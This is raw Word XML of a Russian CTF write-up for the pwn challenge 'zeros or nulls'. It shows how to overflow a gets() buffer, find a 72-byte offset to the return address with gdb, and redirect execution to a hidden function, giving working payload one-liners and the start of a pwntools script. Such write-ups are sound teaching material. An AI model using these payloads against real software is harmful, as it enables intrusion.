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0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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639"/>
        <w:gridCol w:w="7705"/>
      </w:tblGrid>
      <w:tr w:rsidR="009A0DB2" w:rsidTr="009A0DB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DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidTr="009A0DB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9A0DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidTr="009A0DB2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DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB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DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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CybHackCTF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2024 Spring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A0DB2" w:rsidTr="009A0DB2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DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2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DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2">
              <w:t>zeros or nulls</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A0DB2" w:rsidTr="009A0DB2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DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidTr="009A0DB2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DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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DB2" w:rsidRDefault="009A0D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history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>https://ctftime.org/event/2344/tasks/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRDefault="009A0D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https://github.com/cybhack0/writeups-jeopardy-kxctf-2024-spring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A0DB2" w:rsidTr="009A0DB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9A0DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidTr="009A0DB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9A0DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidTr="009A0DB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9A0DB2" w:rsidRDefault="009A0DB2">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0"/>
              <w:outlineLvl w:val="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Условия не было</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A0DB2" w:rsidTr="009A0DB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9A0DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidTr="009A0DB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9A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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>Нам дан код на C, использующий небезопасную функцию </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://www.c-cpp.ru/content/gets" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
              </w:rPr>
              <w:t>gets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve"> и </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>самописная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функция </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>dont_call_me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>(), которая выводит переменную окружения.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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 xml:space="preserve">Внимательно просмотрев код, можно заметить, что функция </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>dont_call_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve">) не вызывается в нашем </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>, там вообще ничего не вызывается.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:before="0" w:beforeAutospacing="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A0DB2" w:rsidTr="009A0DB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DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidRPr="009A0DB2" w:rsidTr="009A0DB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DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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 xml:space="preserve">Обратить внимание, что буфер заполняется через </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>gets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve">). Нужно понять, как ее </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>проэксплуатировать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(подсказка: размер введенной строки пользователя может быть БОЛЬШЕ, чем размер нашего буфера).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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>Теперь узнаем адрес нашего </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://linux-doc.ru/programming/assembler/architecture/rip.php" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
              </w:rPr>
              <w:t>rip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
              </w:rPr>
              <w:t xml:space="preserve"> регистра</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve">, чтобы понять, как это сделать, будем использовать скомпилированный файл </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>zeros_or_nulls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и </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>. Суть в том, чтобы получить </w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                </w:rPr>
                <w:t>SEGFAULT</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve">, благодаря этому узнаем смещение до нашего </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>rip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регистра.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after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>Делается это с помощью команды </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>print</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve"> 'A'* OFFSET" </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>| .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>zeros_or_nulls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>, изначально примем </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>OFFSET=64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve">, потому что буфер именно такого размера, и будем увеличивать его на 4 до тех пор, пока не получим нужную ошибку. Произойдет это при 72 сдвиге, значит следующие 16 байтов - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>rip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>. Их нужно изменить, но на какое значение?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after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>Настало время </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://ru.wikipedia.org/wiki/GNU_Debugger" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
              </w:rPr>
              <w:t>gdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve">. С его помощью легко можно узнать адрес функции </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>), запускаем </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>gdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve"> -q ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>zeros_or_nulls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t> и прописываем </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>disas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>dont_call_me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t> - в первой строке получаем то, что искали </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>0x0000000000400607</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="161B22"/>
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A0DB2" w:rsidTr="009A0DB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0DB2" w:rsidRDefault="009A0DB2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9A0DB2" w:rsidRPr="009A0DB2" w:rsidTr="009A0DB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DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:after="10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9A0DB2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lastRenderedPageBreak/>
              <w:t>Это можно сделать двумя способами:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:beforeAutospacing="1" w:after="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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>bash: </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2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python -c "print 'A'*72 + '\x00\x00\x00\x00\x00\x40\x06\x07'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A0DB2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[::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A0DB2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-1]" | ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A0DB2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zeros_or_nulls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:after="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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>gdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2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 xml:space="preserve">r -A &lt; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A0DB2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&lt;(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A0DB2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  <w:t>python -c "print 'A'*72 + '\x00\x00\x00\x00\x00\x40\x06\x07'[::-1]")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:after="10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9A0DB2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Второй способ позволяет передать в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A0DB2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gdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A0DB2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9A0DB2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null-bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A0DB2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 (\x00), в отличие от способа передачи $(), который их игнорирует.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              <w:spacing w:after="10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9A0DB2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Функция отработала, отлично, теперь переходим к боевому стенду! Для удобства работы напишем </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A0DB2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python</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A0DB2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 скрипт.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>from</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>conn</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
